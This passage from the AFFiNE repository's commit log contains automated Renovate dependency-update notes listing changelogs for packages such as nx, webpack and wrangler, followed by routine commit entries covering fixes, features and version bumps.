- Jack Hsu [@​jaysoo](https://redirect.github.com/jaysoo )
- Juri Strumpflohner [@​juristr](https://redirect.github.com/juristr )
### [`v19.8.1`](https://redirect.github.com/nrwl/nx/releases/tag/19.8.1 )
[Compare Source](https://redirect.github.com/nrwl/nx/compare/19.8.0...19.8.1 )
##### 19.8.1 (2024-09-25)
##### 🚀 Features
- **core:** allow prompts from init generators during nx init ([#​28003](https://redirect.github.com/nrwl/nx/pull/28003 ))
##### 🩹 Fixes
- **bundling:** remove unused `babel-plugin-transform-async-to-promises` from `@nx/rollup` ([#​27669](https://redirect.github.com/nrwl/nx/pull/27669 ))
- **core:** allow creating a db cache without linking task details ([#​28023](https://redirect.github.com/nrwl/nx/pull/28023 ))
- **core:** fix output text for multiple targets ([#​28043](https://redirect.github.com/nrwl/nx/pull/28043 ))
- **core:** sort projects after updating from context ([#​28024](https://redirect.github.com/nrwl/nx/pull/28024 ))
- **core:** add flag when db is disabled for task history ([#​28059](https://redirect.github.com/nrwl/nx/pull/28059 ))
- **core:** set windowsHide: true wherever possible ([#​28073](https://redirect.github.com/nrwl/nx/pull/28073 ))
- **core:** support more structured errors in sync generators ([#​28075](https://redirect.github.com/nrwl/nx/pull/28075 ))
- **core:** nx add should show errors ([#​28079](https://redirect.github.com/nrwl/nx/pull/28079 ))
- **core:** several powerpack fixes ([#​28088](https://redirect.github.com/nrwl/nx/pull/28088 ))
- **core:** remove wasi compatibility while db is unsupported in wasi ([#​28089](https://redirect.github.com/nrwl/nx/pull/28089 ))
- **linter:** do not generate docs.recommended property ([#​28009](https://redirect.github.com/nrwl/nx/pull/28009 ))
- **linter:** ignore dist and use compat helper for eslint-plugin-react-hooks ([#​28080](https://redirect.github.com/nrwl/nx/pull/28080 ))
- **react:** vite should be default bundler in app generator ([#​28013](https://redirect.github.com/nrwl/nx/pull/28013 ))
- **release:** allow dynamically continuing when current version is unresolvable ([#​28034](https://redirect.github.com/nrwl/nx/pull/28034 ))
- **release:** add groupPreVersionCommand to schema, improve logging ([#​28087](https://redirect.github.com/nrwl/nx/pull/28087 ))
##### ❤️ Thank You
- Emily Xiong [@​xiongemi](https://redirect.github.com/xiongemi )
- Jack Hsu [@​jaysoo](https://redirect.github.com/jaysoo )
- James Henry [@​JamesHenry](https://redirect.github.com/JamesHenry )
- Jason Jean [@​FrozenPandaz](https://redirect.github.com/FrozenPandaz )
- Jonathan Cammisuli
- Juri Strumpflohner [@​juristr](https://redirect.github.com/juristr )
- Leosvel Pérez Espinosa [@​leosvelperez](https://redirect.github.com/leosvelperez )
- MaxKless [@​MaxKless](https://redirect.github.com/MaxKless )
- Phillip Barta [@​Phillip9587](https://redirect.github.com/Phillip9587 )
</details>
<details>
<summary>openai/openai-node (openai)</summary>
### [`v4.65.0`](https://redirect.github.com/openai/openai-node/blob/HEAD/CHANGELOG.md#4650-2024-09-26 )
[Compare Source](https://redirect.github.com/openai/openai-node/compare/v4.64.0...v4.65.0 )
Full Changelog: [v4.64.0...v4.65.0](https://redirect.github.com/openai/openai-node/compare/v4.64.0...v4.65.0 )
##### Features
- **api:** add omni-moderation model ([#​1100](https://redirect.github.com/openai/openai-node/issues/1100 )) ([66c0f21](66c0f21fad ))
### [`v4.64.0`](https://redirect.github.com/openai/openai-node/blob/HEAD/CHANGELOG.md#4640-2024-09-25 )
[Compare Source](https://redirect.github.com/openai/openai-node/compare/v4.63.0...v4.64.0 )
Full Changelog: [v4.63.0...v4.64.0](https://redirect.github.com/openai/openai-node/compare/v4.63.0...v4.64.0 )
##### Features
- **client:** allow overriding retry count header ([#​1098](https://redirect.github.com/openai/openai-node/issues/1098 )) ([a466ff7](a466ff78a4 ))
##### Bug Fixes
- **audio:** correct response_format translations type ([#​1097](https://redirect.github.com/openai/openai-node/issues/1097 )) ([9a5f461](9a5f461306 ))
##### Chores
- **internal:** fix ecosystem tests error output ([#​1096](https://redirect.github.com/openai/openai-node/issues/1096 )) ([ecdb4e9](ecdb4e923f ))
- **internal:** fix slow ecosystem test ([#​1093](https://redirect.github.com/openai/openai-node/issues/1093 )) ([80ed9ec](80ed9ecbd6 ))
</details>
<details>
<summary>gpbl/react-day-picker (react-day-picker)</summary>
### [`v9.1.3`](https://redirect.github.com/gpbl/react-day-picker/releases/tag/v9.1.3 )
[Compare Source](https://redirect.github.com/gpbl/react-day-picker/compare/v9.1.2...v9.1.3 )
This release includes some minor build fixes and documentation updates.
#### What's Changed
- build: add `tsconfig-base.json` to package by [@​luucvanderzee](https://redirect.github.com/luucvanderzee ) in [https://github.com/gpbl/react-day-picker/pull/2492 ](https://redirect.github.com/gpbl/react-day-picker/pull/2492 )
- build(deps): bump [@​date-fns/tz](https://redirect.github.com/date-fns/tz ) to 1.1.2 by [@​gpbl](https://redirect.github.com/gpbl ) in [https://github.com/gpbl/react-day-picker/pull/2494 ](https://redirect.github.com/gpbl/react-day-picker/pull/2494 )
#### New Contributors
- [@​luucvanderzee](https://redirect.github.com/luucvanderzee ) made their first contribution in [https://github.com/gpbl/react-day-picker/pull/2492 ](https://redirect.github.com/gpbl/react-day-picker/pull/2492 )
**Full Changelog**: https://github.com/gpbl/react-day-picker/compare/v9.1.2...v9.1.3
</details>
<details>
<summary>tailwindlabs/tailwindcss (tailwindcss)</summary>
### [`v3.4.13`](https://redirect.github.com/tailwindlabs/tailwindcss/releases/tag/v3.4.13 )
[Compare Source](https://redirect.github.com/tailwindlabs/tailwindcss/compare/v3.4.12...v3.4.13 )
##### Fixed
- Improve source glob verification performance ([#​14481](https://redirect.github.com/tailwindlabs/tailwindcss/pull/14481 ))
</details>
<details>
<summary>emilkowalski/vaul (vaul)</summary>
### [`v0.9.9`](59ad745971...a60e76abee )
[Compare Source](59ad745971...a60e76abee )
### [`v0.9.8`](https://redirect.github.com/emilkowalski/vaul/compare/v0.9.7...59ad745971dd3901cd4b1b57f52c6159e81ac87a )
[Compare Source](https://redirect.github.com/emilkowalski/vaul/compare/v0.9.7...59ad745971dd3901cd4b1b57f52c6159e81ac87a )
### [`v0.9.7`](https://redirect.github.com/emilkowalski/vaul/releases/tag/v0.9.7 )
[Compare Source](https://redirect.github.com/emilkowalski/vaul/compare/v0.9.6...v0.9.7 )
#### What's Changed
- fix: horizontal shift by [@​emilkowalski](https://redirect.github.com/emilkowalski ) in [https://github.com/emilkowalski/vaul/pull/443 ](https://redirect.github.com/emilkowalski/vaul/pull/443 )
- fix: make modal false scrollable by [@​emilkowalski](https://redirect.github.com/emilkowalski ) in [https://github.com/emilkowalski/vaul/pull/444 ](https://redirect.github.com/emilkowalski/vaul/pull/444 )
- fix: input repositioning by [@​emilkowalski](https://redirect.github.com/emilkowalski ) in [https://github.com/emilkowalski/vaul/pull/446 ](https://redirect.github.com/emilkowalski/vaul/pull/446 )
- fix: opacity calculation by [@​emilkowalski](https://redirect.github.com/emilkowalski ) in [https://github.com/emilkowalski/vaul/pull/447 ](https://redirect.github.com/emilkowalski/vaul/pull/447 )
- fix: pointer events none by [@​emilkowalski](https://redirect.github.com/emilkowalski ) in [https://github.com/emilkowalski/vaul/pull/449 ](https://redirect.github.com/emilkowalski/vaul/pull/449 )
- fix: prevent nested drawers from scrolling to top by [@​emilkowalski](https://redirect.github.com/emilkowalski ) in [https://github.com/emilkowalski/vaul/pull/450 ](https://redirect.github.com/emilkowalski/vaul/pull/450 )
**Full Changelog**: https://github.com/emilkowalski/vaul/compare/v0.9.5...v0.9.7
### [`v0.9.6`](https://redirect.github.com/emilkowalski/vaul/releases/tag/v0.9.6 )
[Compare Source](https://redirect.github.com/emilkowalski/vaul/compare/v0.9.5...v0.9.6 )
#### What's Changed
Going from 0.9.4 to 0.9.6 in Release notes, because I didn't rebuilt the project when I published 0.9.5.
- Add usePositionFixed hook by [@​emilkowalski](https://redirect.github.com/emilkowalski ) in [https://github.com/emilkowalski/vaul/pull/436 ](https://redirect.github.com/emilkowalski/vaul/pull/436 )
- feat: Don't autofocus within Dialog by [@​emilkowalski](https://redirect.github.com/emilkowalski ) in [https://github.com/emilkowalski/vaul/pull/437 ](https://redirect.github.com/emilkowalski/vaul/pull/437 )
- fix: ensure interaction after closing by [@​emilkowalski](https://redirect.github.com/emilkowalski ) in [https://github.com/emilkowalski/vaul/pull/438 ](https://redirect.github.com/emilkowalski/vaul/pull/438 )
- fix: nested drawers drag by [@​emilkowalski](https://redirect.github.com/emilkowalski ) in [https://github.com/emilkowalski/vaul/pull/439 ](https://redirect.github.com/emilkowalski/vaul/pull/439 )
- fix: drawer failing to cancel move event by [@​emilkowalski](https://redirect.github.com/emilkowalski ) in [https://github.com/emilkowalski/vaul/pull/440 ](https://redirect.github.com/emilkowalski/vaul/pull/440 )
- fix: inputs repositioning by [@​emilkowalski](https://redirect.github.com/emilkowalski ) in [https://github.com/emilkowalski/vaul/pull/441 ](https://redirect.github.com/emilkowalski/vaul/pull/441 )
- feat: add autofocus prop by [@​emilkowalski](https://redirect.github.com/emilkowalski ) in [https://github.com/emilkowalski/vaul/pull/442 ](https://redirect.github.com/emilkowalski/vaul/pull/442 )
**Full Changelog**: https://github.com/emilkowalski/vaul/compare/v0.9.4...v0.9.6
### [`v0.9.5`](https://redirect.github.com/emilkowalski/vaul/compare/v0.9.4...v0.9.5 )
[Compare Source](https://redirect.github.com/emilkowalski/vaul/compare/v0.9.4...v0.9.5 )
</details>
<details>
<summary>vitejs/vite (vite)</summary>
### [`v5.4.8`](https://redirect.github.com/vitejs/vite/releases/tag/v5.4.8 )
[Compare Source](https://redirect.github.com/vitejs/vite/compare/v5.4.7...v5.4.8 )
Please refer to [CHANGELOG.md](https://redirect.github.com/vitejs/vite/blob/v5.4.8/packages/vite/CHANGELOG.md ) for details.
</details>
<details>
<summary>webpack/webpack (webpack)</summary>
### [`v5.95.0`](https://redirect.github.com/webpack/webpack/releases/tag/v5.95.0 )
[Compare Source](https://redirect.github.com/webpack/webpack/compare/v5.94.0...v5.95.0 )
##### Bug Fixes
- Fixed hanging when attempting to read a symlink-like file that it can't read
- Handle `default` for import context element dependency
- Merge duplicate chunks call after split chunks
- Generate correctly code for dynamically importing the same file twice and destructuring
- Use content hash as \[base] and \[name] for extracted DataURI's
- Distinguish `module` and `import` in `module-import` for externals `import`'s
- \[Types] Make `EnvironmentPlugin` default values types less strict
- \[Types] Typescript 5.6 compatibility
##### New Features
- Add new `optimization.entryIife` option (`true` by default for the `production` mode)
- Pass output.hash\* options to loader context
##### Performance
- Avoid unneeded re-visit in build chunk graph
</details>
<details>
<summary>cloudflare/workers-sdk (wrangler)</summary>
### [`v3.78.10`](https://redirect.github.com/cloudflare/workers-sdk/blob/HEAD/packages/wrangler/CHANGELOG.md#37810 )
[Compare Source](https://redirect.github.com/cloudflare/workers-sdk/compare/wrangler@3.78.9...wrangler@3.78.10 )
##### Patch Changes
- [#​6824](https://redirect.github.com/cloudflare/workers-sdk/pull/6824 ) [`1c58a74`](1c58a74707 ) Thanks [@​petebacondarwin](https://redirect.github.com/petebacondarwin )! - fix: tidy up error messaging for unexpected use of Node.js APIs
Fixes [#​6822](https://redirect.github.com/cloudflare/workers-sdk/issues/6822 )
- Updated dependencies \[[`5e2e62c`](5e2e62c165 ), [`1c58a74`](1c58a74707 )]:
- miniflare@3.20240925 .0
### [`v3.78.9`](https://redirect.github.com/cloudflare/workers-sdk/blob/HEAD/packages/wrangler/CHANGELOG.md#3789 )
[Compare Source](https://redirect.github.com/cloudflare/workers-sdk/compare/wrangler@3.78.8...wrangler@3.78.9 )
##### Patch Changes
- [#​6753](https://redirect.github.com/cloudflare/workers-sdk/pull/6753 ) [`4e33f2c`](4e33f2cdc1 ) Thanks [@​bluwy](https://redirect.github.com/bluwy )! - refactor: prevent bundling entire `package.json` in built code
- [#​6812](https://redirect.github.com/cloudflare/workers-sdk/pull/6812 ) [`f700d37`](f700d3704a ) Thanks [@​CarmenPopoviciu](https://redirect.github.com/CarmenPopoviciu )! - fix: Validate additional config properties for `[observability]`
- [#​6751](https://redirect.github.com/cloudflare/workers-sdk/pull/6751 ) [`638a550`](638a55063b ) Thanks [@​bluwy](https://redirect.github.com/bluwy )! - refactor: simplify date calculation and remove date-fns dependency
- [#​6809](https://redirect.github.com/cloudflare/workers-sdk/pull/6809 ) [`28cb0d7`](28cb0d759e ) Thanks [@​smellercf](https://redirect.github.com/smellercf )! - fix: Remove Beta tag from r2 event notification wrangler command descriptions
- [#​6802](https://redirect.github.com/cloudflare/workers-sdk/pull/6802 ) [`17eb8a9`](17eb8a9f9e ) Thanks [@​CarmenPopoviciu](https://redirect.github.com/CarmenPopoviciu )! - chore: rename `experimental_assets` to `assets`
- [#​6781](https://redirect.github.com/cloudflare/workers-sdk/pull/6781 ) [`0792fa0`](0792fa08fb ) Thanks [@​mikenomitch](https://redirect.github.com/mikenomitch )! - chore: tweaks warning when using node_compat
### [`v3.78.8`](https://redirect.github.com/cloudflare/workers-sdk/blob/HEAD/packages/wrangler/CHANGELOG.md#3788 )
[Compare Source](https://redirect.github.com/cloudflare/workers-sdk/compare/wrangler@3.78.7...wrangler@3.78.8 )
##### Patch Changes
- [#​6791](https://redirect.github.com/cloudflare/workers-sdk/pull/6791 ) [`74d719f`](74d719fb8d ) Thanks [@​penalosa](https://redirect.github.com/penalosa )! - fix: Add missing binding to `init --from-dash`
- [#​6728](https://redirect.github.com/cloudflare/workers-sdk/pull/6728 ) [`1ca313f`](1ca313f204 ) Thanks [@​emily-shen](https://redirect.github.com/emily-shen )! - fix: remove filepath encoding on asset upload and handle sometimes-encoded characters
Some characters like \[ ] @​ are encoded by encodeURIComponent() but are often requested at an unencoded URL path.
This change will make assets with filenames with these characters accessible at both the encoded and unencoded paths,
but to use the encoded path as the canonical one, and to redirect requests to the canonical path if necessary.
- [#​6798](https://redirect.github.com/cloudflare/workers-sdk/pull/6798 ) [`7d7f19a`](7d7f19a2ca ) Thanks [@​emily-shen](https://redirect.github.com/emily-shen )! - fix: error if an asset binding is provided without a Worker script
- Updated dependencies \[[`1ca313f`](1ca313f204 )]:
- [@​cloudflare/workers-shared](https://redirect.github.com/cloudflare/workers-shared )[@​0](https://redirect.github.com/0 ).5.4
- miniflare@3.20240909 .5
</details>
---
### Configuration
📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
👻 **Immortal**: This PR will be recreated if closed unmerged. Get [config help](https://redirect.github.com/renovatebot/renovate/discussions ) if that's undesired.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box
---
This PR was generated by [Mend Renovate](https://mend.io/renovate/ ). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE ).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzOC44MC4wIiwidXBkYXRlZEluVmVyIjoiMzguOTcuMCIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->
2024-09-27 08:48:12 +00:00
renovate[bot]
4e30f75c64
chore: bump up @blocksuite/affine version to v0.17.17 ( #8403 )
...
Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2024-09-26 20:36:31 +08:00
darkskygit
a9b29d24f1
feat: improve markdown formatting ( #8398 )
...
fix AF-1442
fix AF-1443
2024-09-26 09:47:53 +00:00
forehalo
dbcbe9ce1a
feat(infra): orm document mode support ( #8390 )
...
```
info: t.document({
id: f.primaryKey().string()
})
```
```
tables.info.create({ id: '', a: 1, b: 2 })
```
2024-09-26 09:09:05 +00:00
EYHN
4295f5e7c1
fix(core): open page info modal error ( #8396 )
2024-09-26 06:36:41 +00:00
JimmFly
bd9ae3d80a
fix(core): adjust the tracking point for copy sharing link ( #8395 )
...
close AF-1439
2024-09-26 03:27:18 +00:00
pengx17
abd57484ba
fix: incorrect app sidebar fallback ( #8392 )
...
fix AF-1435
2024-09-25 10:15:26 +00:00
pengx17
76ff56a716
feat: add open info button to doc center peek ( #8388 )
...
fix AF-1229

2024-09-25 09:11:25 +00:00
L-Sun
0416e51c83
chore: remove blocksuite local debug option ( #8386 )
...
This PR removes the blocksuite local debug option when running `yarn dev`.
After this, to enable local debugging, simply run
```sh
yarn link <path-to-blocksuite> -A
yarn dev
```
You can disable local debugging by running
```sh
yarn unlink <path-to-blocksuite> -A
```
2024-09-25 08:50:09 +00:00
renovate[bot]
2c25efa1ba
chore: bump up @blocksuite/affine version to v0.17.16 ( #8372 )
...
Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2024-09-25 07:53:57 +00:00
forehalo
1d75d97a8f
fix(server): handle hanging workspace after user account deleted ( #8377 )
...
fix CLOUD-74
2024-09-25 06:16:32 +00:00
pengx17
d0050a268a
build: fine tune swc config ( #8384 )
...
1. only run react related swc transforms for tsx files
2. exclude ts from ReactRefreshWebpackPlugin
2024-09-25 04:39:24 +00:00
JimmFly
45f5c89cd8
fix(core): can not scroll when backlink list is too long ( #8370 )
...
close AF-1431
2024-09-25 04:28:09 +00:00
fundon
4daa959894
fix(core): block link recognition in self-hosted ( #8340 )
...
Part of [BS-1445](https://linear.app/affine-design/issue/BS-1445/点击-affine-link-时识别应用内链接,以触发应用内跳转 )
<div class='graphite__hidden'>
<div>🎥 Video uploaded on Graphite:</div>
<a href="https://app.graphite.dev/media/video/8ypiIKZXudF5a0tIgIzf/fae580bc-7d30-4711-a70e-7a5cf26c76f1.mov ">
<img src="https://app.graphite.dev/api/v1/graphite/video/thumbnail/8ypiIKZXudF5a0tIgIzf/fae580bc-7d30-4711-a70e-7a5cf26c76f1.mov ">
</a>
</div>
<video src="https://graphite-user-uploaded-assets-prod.s3.amazonaws.com/8ypiIKZXudF5a0tIgIzf/fae580bc-7d30-4711-a70e-7a5cf26c76f1.mov ">Screen Recording 2024-09-21 at 10.50.12.mov</video>
2024-09-25 04:16:58 +00:00
pengx17
e839947dd5
fix(electron): enable WAL mode for sqlite ( #8336 )
...
fix AF-1015
2024-09-25 04:06:03 +00:00
CatsJuice
e6feb17ac7
fix(mobile): cannot run locally ( #8383 )
2024-09-25 03:54:57 +00:00
forehalo
cb4020569c
fix(server): remove unused admin environment ( #8378 )
...
fix CLOUD-70
2024-09-25 02:45:28 +00:00
JimmFly
2df2003bd7
fix(core): handle composition event for Input component ( #8351 )
...
close AF-1065
2024-09-25 02:02:23 +00:00
darkskygit
ed8e4e30f0
fix: collect workflow's assistant content ( #8373 )
...
fix CLOUD-71
2024-09-24 12:35:48 +00:00
renovate
789e593d93
chore: bump up all non-major dependencies ( #8314 )
...
This PR contains the following updates:
| Package | Change | Age | Adoption | Passing | Confidence | Type | Update |
|---|---|---|---|---|---|---|---|
| [@electron-forge/cli](https://redirect.github.com/electron/forge ) | [`7.4.0` -> `7.5.0`](https://renovatebot.com/diffs/npm/@electron-forge%2fcli/7.4.0/7.5.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@electron-forge/core](https://redirect.github.com/electron/forge ) | [`7.4.0` -> `7.5.0`](https://renovatebot.com/diffs/npm/@electron-forge%2fcore/7.4.0/7.5.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@electron-forge/core-utils](https://redirect.github.com/electron/forge ) | [`7.4.0` -> `7.5.0`](https://renovatebot.com/diffs/npm/@electron-forge%2fcore-utils/7.4.0/7.5.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@electron-forge/maker-base](https://redirect.github.com/electron/forge ) | [`7.4.0` -> `7.5.0`](https://renovatebot.com/diffs/npm/@electron-forge%2fmaker-base/7.4.0/7.5.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | resolutions | minor |
| [@electron-forge/maker-deb](https://redirect.github.com/electron/forge ) | [`7.4.0` -> `7.5.0`](https://renovatebot.com/diffs/npm/@electron-forge%2fmaker-deb/7.4.0/7.5.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@electron-forge/maker-dmg](https://redirect.github.com/electron/forge ) | [`7.4.0` -> `7.5.0`](https://renovatebot.com/diffs/npm/@electron-forge%2fmaker-dmg/7.4.0/7.5.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@electron-forge/maker-squirrel](https://redirect.github.com/electron/forge ) | [`7.4.0` -> `7.5.0`](https://renovatebot.com/diffs/npm/@electron-forge%2fmaker-squirrel/7.4.0/7.5.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@electron-forge/maker-zip](https://redirect.github.com/electron/forge ) | [`7.4.0` -> `7.5.0`](https://renovatebot.com/diffs/npm/@electron-forge%2fmaker-zip/7.4.0/7.5.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@electron-forge/plugin-auto-unpack-natives](https://redirect.github.com/electron/forge ) | [`7.4.0` -> `7.5.0`](https://renovatebot.com/diffs/npm/@electron-forge%2fplugin-auto-unpack-natives/7.4.0/7.5.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@electron-forge/shared-types](https://redirect.github.com/electron/forge ) | [`7.4.0` -> `7.5.0`](https://renovatebot.com/diffs/npm/@electron-forge%2fshared-types/7.4.0/7.5.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@fal-ai/serverless-client](https://redirect.github.com/fal-ai/fal-js ) ([source](https://redirect.github.com/fal-ai/fal-js/tree/HEAD/libs/client )) | [`0.14.2` -> `0.14.3`](https://renovatebot.com/diffs/npm/@fal-ai%2fserverless-client/0.14.2/0.14.3 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [@playwright/test](https://playwright.dev ) ([source](https://redirect.github.com/microsoft/playwright )) | [`=1.47.1` -> `=1.47.2`](https://renovatebot.com/diffs/npm/@playwright%2ftest/1.47.1/1.47.2 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@sentry/react](https://redirect.github.com/getsentry/sentry-javascript/tree/master/packages/react ) ([source](https://redirect.github.com/getsentry/sentry-javascript )) | [`8.30.0` -> `8.31.0`](https://renovatebot.com/diffs/npm/@sentry%2freact/8.30.0/8.31.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@sentry/react](https://redirect.github.com/getsentry/sentry-javascript/tree/master/packages/react ) ([source](https://redirect.github.com/getsentry/sentry-javascript )) | [`8.30.0` -> `8.31.0`](https://renovatebot.com/diffs/npm/@sentry%2freact/8.30.0/8.31.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@storybook/addon-essentials](https://redirect.github.com/storybookjs/storybook/tree/next/code/addons/essentials ) ([source](https://redirect.github.com/storybookjs/storybook/tree/HEAD/code/addons/essentials )) | [`8.3.1` -> `8.3.2`](https://renovatebot.com/diffs/npm/@storybook%2faddon-essentials/8.3.1/8.3.2 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@storybook/addon-interactions](https://redirect.github.com/storybookjs/storybook/tree/next/code/addons/interactions ) ([source](https://redirect.github.com/storybookjs/storybook/tree/HEAD/code/addons/interactions )) | [`8.3.1` -> `8.3.2`](https://renovatebot.com/diffs/npm/@storybook%2faddon-interactions/8.3.1/8.3.2 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@storybook/addon-links](https://redirect.github.com/storybookjs/storybook/tree/next/code/addons/links ) ([source](https://redirect.github.com/storybookjs/storybook/tree/HEAD/code/addons/links )) | [`8.3.1` -> `8.3.2`](https://renovatebot.com/diffs/npm/@storybook%2faddon-links/8.3.1/8.3.2 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@storybook/addon-mdx-gfm](https://redirect.github.com/storybookjs/storybook/tree/next/code/addons/gfm ) ([source](https://redirect.github.com/storybookjs/storybook/tree/HEAD/code/addons/gfm )) | [`8.3.1` -> `8.3.2`](https://renovatebot.com/diffs/npm/@storybook%2faddon-mdx-gfm/8.3.1/8.3.2 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@storybook/react](https://redirect.github.com/storybookjs/storybook/tree/next/code/renderers/react ) ([source](https://redirect.github.com/storybookjs/storybook/tree/HEAD/code/renderers/react )) | [`8.3.1` -> `8.3.2`](https://renovatebot.com/diffs/npm/@storybook%2freact/8.3.1/8.3.2 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@storybook/react-vite](https://redirect.github.com/storybookjs/storybook/tree/next/code/frameworks/react-vite ) ([source](https://redirect.github.com/storybookjs/storybook/tree/HEAD/code/frameworks/react-vite )) | [`8.3.1` -> `8.3.2`](https://renovatebot.com/diffs/npm/@storybook%2freact-vite/8.3.1/8.3.2 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@types/react](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/master/types/react ) ([source](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/HEAD/types/react )) | [`18.3.7` -> `18.3.8`](https://renovatebot.com/diffs/npm/@types%2freact/18.3.7/18.3.8 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [electron](https://redirect.github.com/electron/electron ) | [`32.1.1` -> `32.1.2`](https://renovatebot.com/diffs/npm/electron/32.1.1/32.1.2 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [esbuild](https://redirect.github.com/evanw/esbuild ) | [`^0.23.0` -> `^0.24.0`](https://renovatebot.com/diffs/npm/esbuild/0.23.1/0.24.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
